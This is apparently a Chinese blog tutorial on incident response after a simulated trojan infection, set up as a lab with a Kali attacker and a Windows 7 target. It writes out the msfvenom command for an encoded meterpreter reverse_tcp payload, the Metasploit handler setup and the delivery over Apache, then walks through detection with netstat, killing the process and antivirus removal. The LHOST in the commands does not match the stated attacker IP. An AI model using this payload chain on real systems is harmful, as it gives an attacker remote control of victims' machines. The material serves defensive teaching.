应急响应-模拟服务器挂马后的应急相关操作

工具:

攻击机:

kail:192.168.108.131

kail下载地址:https://mirrors.aliyun.com/kali-images/kali-2021.3/kali-linux-2021.3-live-i386.iso

靶机:

windows 7: 192.168.108.132

1、在kali中制作木马文件:vhost.exe,放置在kali的网站目录下:/var/www/html

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.188.134 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vhosts.exe

2、开启apache服务,模拟受害者访问攻击者木马文件所在的网址,并下载木马文件

systemctl start apache2

netstat -ntpl

3、在kali上启动msf控制器,并选择相关模块,设置目标ip和端口

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set lhost 192.168.188.134

set lport 9999

4、在攻击机执行run命令监听端口,在靶机访问攻击机IP下载木马文件

kail:run

windows 7:http://192.168.108.131/vhost.exe

5、双击运行木马文件,然后回到攻击机发现连接成功

以上步骤模拟服务器挂马操作

6、现在受害者发现自己电脑中了木马,进行应急排查

netstat -ano | more

首先执行该命令来查看电脑运行程序有哪些存在异常,这里发现有个程序连接了一个外部IP,存在是木马的嫌疑,因此需要进一步测定。

7、打开任务管理器找到该PID对应的进程,首先结束该进程。

结束该进程后,kali与靶机连接中断

8、然后找到该进程对应的程序,接着使用一些杀毒软件检测该程序是否为木马。

经检测该程序确实为木马,删除该程序即可。在该模拟中则应急结束,然而在实际情况中还需要查出漏洞点,修复该漏洞,安装杀毒软件以及防火墙后应急结束。

总结

windows木马排查方向

1、可能通过网络连接观察异常的端口或者IP通信

2、可以通过任务管理器,详细信息,找到异常文件,使用杀毒软件检测

防御:

1、开启windows 防火墙

2、安装正版杀毒软件

相关推荐
久违 °15 小时前
【安全开发】Nuclei源码分析-任务执行流程(三)
安全·网络安全·go
white-persist15 小时前
汇编代码详细解释:汇编语言如何转化为对应的C语言,怎么转化为对应的C代码?
java·c语言·前端·网络·汇编·安全·网络安全
jenchoi41318 小时前
【2025-11-03】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
Z_renascence18 小时前
web214-web220
web安全·网络安全
hu1j19 小时前
[HTB] 靶机学习(十二)Eureka
学习·安全·web安全·网络安全·云原生·eureka
jenchoi4131 天前
【2025-11-04】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
hcja6661 天前
WordPress wpForo Forum插件漏洞CVE-2025-11740复现
web安全·网络安全
安全不再安全1 天前
免杀技巧 - 早鸟注入详细学习笔记
linux·windows·笔记·学习·测试工具·web安全·网络安全
竹等寒1 天前
Go红队开发—图形化界面
网络安全·golang·个人开发
Jerry2505092 天前
怎么才能实现网站HTTPS访问?
网络协议·http·网络安全·https·ssl